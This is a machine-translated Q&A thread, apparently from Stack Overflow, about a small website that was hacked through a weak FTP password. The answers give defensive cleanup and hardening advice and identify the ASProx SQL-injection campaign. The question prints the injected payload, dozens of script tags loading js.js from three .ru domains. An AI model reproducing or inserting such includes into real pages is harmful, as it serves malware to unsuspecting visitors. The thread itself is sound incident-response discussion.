23

今日、父から電話があり、彼の Web サイトにアクセスしている人々が 168 のウイルスを自分のコンピューターにダウンロードしようとしているとのことでした。彼はまったく技術的ではなく、WYSIWYG エディターですべてを構築しました。

彼のサイトを開いてソースを表示したところ、ソースの一番下の HTML 終了タグの直前に Javascript インクルードの行がありました。彼らはこのファイルを含めました(他の多くのファイルの中でも):http ://www.98hs.ru/js.js <--そのURLにアクセスする前にJAVASCRIPTをオフにしてください。

ということで、とりあえずコメントアウト。彼の FTP パスワードは 6 文字の長さの平凡な辞書の単語であることが判明したため、それがハッキングされた方法であると考えられます。彼のパスワードを 8 桁以上の単語以外の文字列に変更しました (彼はハントアンドペック タイパーであるため、パスフレーズを求めませんでした)。

98hs.ru で whois を調べたところ、チリのサーバーからホストされていることがわかりました。実際にメールアドレスも関連付けられていますが、この人物が犯人ではないかと疑っています。おそらく、ハッキングされた他のサイトだけです...

この種のことをこれまで扱ったことがないので、この時点で何をすべきかわかりません。誰にも提案はありますか?

彼は、webhost4life.com を通じてプレーンジェーンのセキュリティで保護されていない ftp を使用していました。彼らのサイトで sftpを実行する方法さえ見当たりません。彼のユーザー名とパスワードが傍受されたと思いますか?

コミュニティとの関連性を高めるために、Web サイトをハッキングから保護するための手順やベスト プラクティスは何ですか?

記録のために、ここに「魔法のように」彼のファイルに追加されたコード行があります (彼のコンピューターのファイルにはありません - 何もしないことを絶対に確認するためにコメントアウトしたままにしています)このページでは、ジェフはこれを防ぐと確信していますが):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
4

8 に答える 8

15

できるだけ多くの情報を収集してみてください。アカウントに対して行われたすべての FTP 接続を示すログをホストが提供できるかどうかを確認します。これらを使用して、変更を行い、場合によっては IP アドレスを取得するために使用されたのが FTP 接続であったかどうかを確認できます。

Wordpress、Drupal、またはコーディングしていないその他のパッケージ済みソフトウェアを使用している場合、この種の変更を可能にするアップロード コードに脆弱性がある可能性があります。カスタムビルドの場合は、ユーザーがファイルをアップロードしたり、既存のファイルを変更したりできる場所を再確認してください。

2 つ目は、サイトのダンプをそのまま取得し、他の変更がないかすべてをチェックすることです。彼らが行った変更は 1 つだけかもしれませんが、FTP 経由でアクセスした場合、他に何があるかはわかりません。

サイトを既知の良好な状態に戻し、必要に応じて最新バージョンにアップグレードします。

考慮しなければならないリターンのレベルもあります。被害者を追跡する価値はありますか、それとも、生きて学習し、より強力なパスワードを使用するだけのものですか?

于 2008-08-06T00:16:07.797 に答える
14

これはゲームの少し遅いことは知っていますが、JavaScriptで言及されているURLは、6月に開始されたASPRoxボットの復活の一部であることがわかっているサイトのリストに記載されています(少なくとも、それは私たちがフラグを立てられていたときです)それ)。それについてのいくつかの詳細は以下に述べられています:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

これについての厄介なことは、データベース内のすべてのvarcharタイプのフィールドが事実上「感染」して、このURLへの参照を吐き出し、ブラウザがそれをボットに変える小さなiframeを取得することです。これに対する基本的なSQL修正はここにあります:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

ただし、恐ろしいのは、ウイルスが感染する値をシステムテーブルで探し、多くの共有ホスティングプランがクライアントのデータベーススペースも共有していることです。おそらく、感染したのはあなたのお父さんのサイトではなく、彼のホスティングクラスター内の他の誰かのサイトがいくつかの貧弱なコードを書き、SQLインジェクション攻撃への扉を開いたのです。

彼がまだそうしていない場合は、緊急の電子メールをホストに送信し、システム全体を修正するためにそのSQLコードへのリンクを提供します。影響を受けた独自のデータベーステーブルを修正することはできますが、感染を実行しているボットが再びその穴を通過して、大量に感染する可能性があります。

うまくいけば、これはあなたに作業するためのいくつかのより多くの情報を与えるでしょう。

編集:もう1つ簡単に考えてみましょう。彼が、ホストのオンラインデザインツールの1つを使用してウェブサイトを構築している場合、そのコンテンツはすべて列に並んでいて、そのように感染している可能性があります。

于 2008-08-07T22:49:55.830 に答える
5

あなたのお父さんがウェブサイト公開ツールを使っていたとあなたは言いました。

パブリッシュ ツールがコンピュータからサーバーにパブリッシュする場合、ローカル ファイルがクリーンであり、サーバーに再パブリッシュする必要があるだけである可能性があります。

彼は自分のサーバーへの通常の FTP とは異なるログイン方法があるかどうかを確認する必要がありますが、インターネット経由でパスワードを平文で送信するため、あまり安全ではありません。

于 2008-08-06T03:31:22.940 に答える
3

6 ワード文字のパスワードでは、ブルート フォースされた可能性があります。それは、彼の ftp が傍受されるよりも可能性が高いですが、それも可能性があります。

より強力なパスワードから始めます。(8キャラはまだかなり弱い)

インターネットセキュリティ ブログへのこのリンクが役立つかどうかを確認してください。

于 2008-08-06T00:00:22.180 に答える
2

サイトは単なる静的 HTML ですか? つまり、車で通りかかった人が侵害されたスクリプト/ページをアップロードできるようにするアップロード ページを自分でコーディングできなかったのでしょうか?

利用可能な FTP ログがあるかどうか webhost4life に問い合わせて、問題を報告してください。彼らは非常に受容的で、何が起こったのかを正確に知ることができますか?

私は共有ホストで働いており、このようなレポートを常に歓迎しており、通常は攻撃ベースの正確なベクトルを特定し、顧客がどこで問題を起こしたかについてアドバイスすることができます.

于 2008-08-06T00:24:23.927 に答える
0

シャットダウンスクリプトを回避するために、シャットダウンせずにWebサーバーのプラグを抜きます。データドライブとして別のコンピューターを介してハードディスクを分析し、ログファイルおよびその性質のものから原因を特定できるかどうかを確認します。コードが安全であることを確認してから、バックアップから復元します。

于 2008-09-26T20:12:13.310 に答える
0

これは、最近、ipower でホストされていた私のクライアントに起こりました。あなたのホスティング環境が Apache ベースであったかどうかはわかりませんが、作成していない .htaccess ファイルを再確認してください。特に webroot の上とイメージ ディレクトリ内にあります。同様に(参照のどこから来たかに応じて、人々をリダイレクトしていました)。また、作成していないコードについて作成したものも確認してください。

于 2008-09-26T20:21:14.443 に答える
-1

どうやら同じ人からハッキングされていたようです!またはボット、私たちの場合。彼らは、誰ももう維持していないいくつかの古い古典的なASPサイトのURLでSQLインジェクションを使用しました。攻撃しているIPを見つけ、IISでブロックしました。ここで、すべての古いASPをリファクタリングする必要があります。したがって、私のアドバイスは、最初にIISログを調べて、サイトのコードまたはサーバー構成に問題があるかどうかを確認することです。

于 2008-08-16T16:35:18.043 に答える